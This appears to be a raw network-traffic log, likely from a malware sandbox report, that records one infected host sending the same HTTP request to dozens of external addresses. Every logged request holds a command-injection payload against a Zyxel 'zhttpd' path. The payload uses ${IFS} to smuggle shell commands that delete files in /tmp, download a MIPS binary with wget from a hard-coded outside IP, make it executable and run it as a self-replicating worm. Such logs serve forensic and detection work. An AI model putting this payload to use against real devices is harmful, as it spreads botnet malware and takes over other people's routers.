                                                Jan 28, 2024 10:16:30.889877081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5676192.168.2.234816445.4.5.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.889911890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5677192.168.2.234705227.46.217.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.889964104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5678192.168.2.2342726208.169.229.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890005112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5679192.168.2.2345230120.139.85.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890023947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5680192.168.2.2346176202.15.221.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890054941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5681192.168.2.23361025.146.29.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890065908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5682192.168.2.2346696190.181.30.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890069962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5683192.168.2.2348678122.109.153.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890113115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5684192.168.2.2355030175.56.48.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890146017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5685192.168.2.2334446101.158.6.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890176058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5686192.168.2.233840023.38.73.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890197992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5687192.168.2.234042468.181.72.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890208960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5688192.168.2.233742040.223.110.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890233994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5689192.168.2.2347554216.4.45.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890252113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5690192.168.2.2353182173.85.183.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890305042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5691192.168.2.234048287.24.189.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890311003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5692192.168.2.23438341.6.0.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890341997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5693192.168.2.234757441.243.85.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890373945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5694192.168.2.2351582122.166.128.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890394926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5695192.168.2.2353390165.38.241.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890423059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5696192.168.2.235819492.176.224.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890451908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5697192.168.2.2352850132.139.216.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890469074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5698192.168.2.234820861.86.117.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890489101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5699192.168.2.2340550124.125.161.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890547037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5700192.168.2.235670837.169.67.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890575886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5701192.168.2.234147086.117.226.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890599012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5702192.168.2.2339738212.60.72.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890625954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5703192.168.2.2341788132.127.53.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890652895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5704192.168.2.2348168189.6.105.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890706062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5705192.168.2.2350032149.152.4.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890706062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5706192.168.2.2349526213.9.171.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890717030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5707192.168.2.233786288.248.25.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890754938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5708192.168.2.2351726217.42.244.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890769958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5709192.168.2.234942688.88.136.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890800953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5710192.168.2.2348586174.28.212.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890830040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5711192.168.2.2358414108.11.103.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890861988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5712192.168.2.234299263.71.184.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890886068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5713192.168.2.2333536182.77.159.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890918970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5714192.168.2.2358392129.219.230.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890944958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5715192.168.2.233638467.22.222.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890944958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5716192.168.2.2344274220.172.143.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.890990973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5717192.168.2.235997019.209.164.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891006947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5718192.168.2.2333480199.233.240.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891063929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5719192.168.2.2339500160.216.193.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891103029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5720192.168.2.2354666176.170.157.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891133070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5721192.168.2.234316878.59.241.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891151905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5722192.168.2.234088664.115.12.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891180038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5723192.168.2.235681093.239.149.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891211987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5724192.168.2.234922632.174.41.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891222000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5725192.168.2.2357702159.160.166.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891249895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5726192.168.2.2339394198.243.43.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891273975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5727192.168.2.2343592110.149.18.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891293049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5728192.168.2.235989268.204.135.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891326904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5729192.168.2.2335808171.219.106.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891345978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5730192.168.2.2341012223.193.119.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891391039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5731192.168.2.2359974152.92.224.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891393900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5732192.168.2.2358600103.99.200.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891443014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5733192.168.2.2334492183.55.202.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891453028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5734192.168.2.235229493.79.112.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891485929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5735192.168.2.235655494.54.88.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891505957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5736192.168.2.2350764199.133.214.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.891539097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5737192.168.2.2360060195.41.74.16443
                                                TimestampBytes transferredDirectionData
